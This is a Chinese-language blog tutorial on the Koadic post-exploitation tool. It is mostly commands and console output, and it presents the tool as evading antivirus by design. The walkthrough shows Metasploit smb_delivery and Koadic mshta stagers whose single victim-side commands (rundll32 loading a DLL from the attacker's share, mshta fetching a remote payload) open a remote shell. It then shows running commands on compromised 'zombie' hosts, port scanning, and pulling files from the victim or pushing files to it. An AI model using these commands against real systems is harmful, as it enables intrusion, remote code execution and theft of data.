有趣的后渗透工具Koadic

发表于 更新于 分类于 本文字数: 5.5k
koadic是DEFCON黑客大会上分享出来的的一个后渗透工具,虽然和msf有些相似,但是Koadic主要是通过使用WindowsScriptHost(也称为JScript/VBScript)进行大部分的操作,其核心兼容性支持WindowsXP到Window10的环境中使用,Koadic的相比于其他的后门程序来说更轻便,该工具通过调用系统的一些命令来完成Shell的反弹工作,因为调用的是系统的模块,所以天生免杀。你只需要在目标主机上执行一条命令,即可完全控制目标主机,该工具在圈内有一个别名大宝剑,对于一个热衷于后渗透测试的人员来说,算的上是,"居家旅行,杀人越货"必备良品了!

koadic是DEFCON黑客大会上分享出来的的一个后渗透工具,虽然和msf有些相似,但是Koadic主要是通过使用Windows ScriptHost(也称为JScript / VBScript)进行大部分的操作,其核心兼容性支持WindowsXP到Window 10的环境中使用,Koadic的相比于其他的后门程序来说更轻便,该工具通过调用系统的一些命令来完成Shell的反弹工作,因为调用的是系统的模块,所以天生免杀。你只需要在目标主机上执行一条命令,即可完全控制目标主机,该工具在圈内有一个别名:大宝剑,对于一个热衷于后渗透测试的人员来说,算的上是,”居家旅行,杀人越货”必备良品了!

再开始使用Koadic之前,我们先通过使用smb_delivery完成一次反弹。要使用此方法,我们先来通过MSF来启动一个服务。

msf5 > use exploit/windows/smb/smb_delivery
msf5 exploit(windows/smb/smb_delivery) > set srvhost 192.168.1.40
srvhost => 192.168.1.40
msf5 exploit(windows/smb/smb_delivery) > exploit -j -z

[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 192.168.1.40:4444 
[*] Started service listener on 192.168.1.40:445 
[*] Server started.
[*] Run the following command on the target machine:
rundll32.exe \\192.168.1.40\aCxwTB\test.dll,0

我们记下上方的上线地址,rundll32.exe \192.168.1.40\aCxwTB\test.dll,0 ,然后在被害主机执行此命令,然后Kali成功上线,并且杀软没有报毒。

Microsoft Windows [版本 10.0.17763.316]
(c) 2018 Microsoft Corporation。保留所有权利。

C:\Users\lyshark>rundll32.exe \\192.168.1.40\aCxwTB\test.dll,0

1.好了,进入正题,默认情况下Koadic工具并没有安装在Kali系统中,我们需要手动下载并安装。

root@kali:~#  git clone https://github.com/zerosum0x0/koadic.git
root@kali:~#  cd koadic/
root@kali:~#  chmod 755 -R *
root@kali:~#  pip3 install -r requirements.txt
root@kali:~#  python3 koadic
                            .
                           / \
     _                   _ | |
    | | _____   __ _  __| || |  ___
    | |/ / _ \ / _` |/ _` ||.| / __|
    |   / (o) | (_| | (_| ||.|| (__
    |_|\_\_^_/ \__,_|\__,_||:| \___|
                           |:|
                        ~\==8==/~
                            8
                            O

(koadic: sta/js/mshta)#

2.接着我们就使用一个攻击载荷,这里面有三个比较不错的载荷分别是,stager/js/mshta,stager/js/regsvr,stager/js/rundll32_js,我们以第一个载荷为例。

(koadic: sta/js/mshta)# use stager/js/mshta
(koadic: sta/js/mshta)# set lhost 192.168.1.40
[+] LHOST => 192.168.1.40
(koadic: sta/js/mshta)# run
[+] Spawned a stager at http://192.168.1.40:9999/A324A
[!] Don't edit this URL! (See: 'help portfwd')

[>] mshta http://192.168.1.40:9999/A324A

3.执行完以后,会弹出 mshta http://192.168.1.40:9999/A324A 记下这条命令,并去受害主机执行。

Microsoft Windows [版本 10.0.17763.316]
(c) 2018 Microsoft Corporation。保留所有权利。

C:\Users\lyshark>mshta http://192.168.1.40:9999/A324A

4.成功反弹Shell以后,我们可以使用 zombies 命令查看所以的受害僵尸主机。

[+] Zombie 0: Staging new connection (192.168.1.2)
[+] Zombie 0: DESKTOP-SKVC\lyshark* @ DESKTOP-SKVC -- Windows 10 Enterprise LTSC 2019
(koadic: sta/js/mshta)# zombies
 
	ID   IP              STATUS  LAST SEEN       
	---  ---------       ------- ------------    
	0*   192.168.1.2     Alive   2019-08-12 20:09:24
 
Use "zombies ID" for detailed information about a session.
Use "zombies IP" for sessions on a particular host.
Use "zombies DOMAIN" for sessions on a particular Windows domain.
Use "zombies killed" for sessions that have been manually killed.

zombies后方添加编号,可以查看具体主机的详细情况。

(koadic: sta/js/mshta)# zombies 0
 
	ID:                     0                               
	Status:                 Alive                           
	First Seen:             2019-08-12 20:08:37             
	Last Seen:              2019-08-12 20:11:24             
	Listener:               0                               
 
	IP:                     192.168.1.2                     
	User:                   DESKTOP-SKVC\lyshark*        
	Hostname:               DESKTOP-SKVC                
	Primary DC:             Unknown                         
	OS:                     Windows 10 Enterprise LTSC 2019 
	OSBuild:                17763                           
	OSArch:                 64                              
	Elevated:               YES!                            
 
	User Agent:             Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0;)
	Session Key:            316d78e7a8239880
 
	JOB  NAME                            STATUS    ERRNO   
	---- ---------                       -------   -------

5.如果需要执行CMD命令可以使用cmd_shell,如下。

(koadic: sta/js/mshta)# cmdshell 0
[koadic: ZOMBIE 0 (192.168.1.2) - C:\Users\lyshark]> ipconfig
[*] Zombie 0: Job 0 (implant/manage/exec_cmd) created.
Result for `cd C:\Users\lyshark & ipconfig`:          
                                                      
Windows IP 配置

网适配器 WLAN:

   媒体状态  . . . . . . . . . . . . : 媒体已断开连接
   连接特定的 DNS 后缀 . . . . . . . :

6.也可以扫描本台主机端口的开放情况。

(koadic: sta/js/mshta)# use implant/scan/tcp
(koadic: imp/sca/tcp)# info
 
	NAME        VALUE               REQ     DESCRIPTION     
	-----       ------------        ----    -------------   
	RHOSTS                          yes     name/IP of the remotes
	RPORTS      22,80,135,139,44... yes     ports to scan   
	TIMEOUT     2                   yes     longer is more accurate
	CHECKLIVE   true                yes     check if host is up before checking ports
	ZOMBIE      ALL                 yes     the zombie to target

(koadic: imp/sca/tcp)# set RHOSTS 192.168.1.2
[+] RHOSTS => 192.168.1.2
(koadic: imp/sca/tcp)# run
[*] Zombie 0: Job 1 (implant/scan/tcp) created.
[*] Zombie 0: Job 1 (implant/scan/tcp) 192.168.1.2         22        closed     80072efd  
[*] Zombie 0: Job 1 (implant/scan/tcp) 192.168.1.2         80        closed     80072efd  
[+] Zombie 0: Job 1 (implant/scan/tcp) 192.168.1.2         135       open       00000000  
[+] Zombie 0: Job 1 (implant/scan/tcp) 192.168.1.2         139       open       80072f78  
[*] Zombie 0: Job 1 (implant/scan/tcp) 192.168.1.2         443       closed     80072efd  
[+] Zombie 0: Job 1 (implant/scan/tcp) 192.168.1.2         445       open       80072efe  
[*] Zombie 0: Job 1 (implant/scan/tcp) 192.168.1.2         3389      closed     80072efd  
[+] Zombie 0: Job 1 (implant/scan/tcp) completed.

7.从僵尸主机上面下载一个文件,可以使用 implant/util/download_file 模块。

(koadic: imp/sca/tcp)# use implant/util/download_file
(koadic: imp/uti/download_file)# 
(koadic: imp/uti/download_file)# info
 
	NAME        VALUE               REQ     DESCRIPTION     
	-----       ------------        ----    -------------   
	LPATH       /tmp/               yes     local file save path
	RFILE                           no      remote file to get
	RFILELIST                       no      file containing line-seperated file names to download
	CHUNKSIZE   10000000            yes     size in bytes (kind of) of chunks to save, helps avoid MemoryError exceptions
	CERTUTIL    false               yes     use certutil to base64 encode the file before downloading
	ZOMBIE      ALL                 yes     the zombie to target
(koadic: imp/uti/download_file)# set zombie 0
[+] ZOMBIE => 0
(koadic: imp/uti/download_file)# set rfile c:\lyshark.exe
[+] RFILE => c:\lyshark.exe
(koadic: imp/uti/download_file)# run
[*] Zombie 0: Job 4 (implant/util/download_file) created.
[+] Zombie 0: Job 4 (implant/util/download_file) completed.
[+] c:\lyshark.exe saved to /tmp/lyshark.exe (940602 bytes)

8.上传文件则可以使用,implant/util/upload_file 这个模块。

(koadic: imp/uti/download_file)# use implant/util/upload_file
(koadic: imp/uti/upload_file)# 
(koadic: imp/uti/upload_file)# info
 
	NAME        VALUE               REQ     DESCRIPTION     
	-----       ------------        ----    -------------   
	LFILE                           yes     local file to upload
	DIRECTORY   %TEMP%              no      writeable directory
	ZOMBIE      ALL                 yes     the zombie to target
 
(koadic: imp/uti/upload_file)# set zombie 0
[+] ZOMBIE => 0
(koadic: imp/uti/upload_file)# set lfile /tmp/lyshark.exe
[+] LFILE => /tmp/lyshark.exe
(koadic: imp/uti/upload_file)# run
[*] Zombie 0: Job 5 (implant/util/upload_file) created.
[+] Zombie 0: Job 5 (implant/util/upload_file) completed.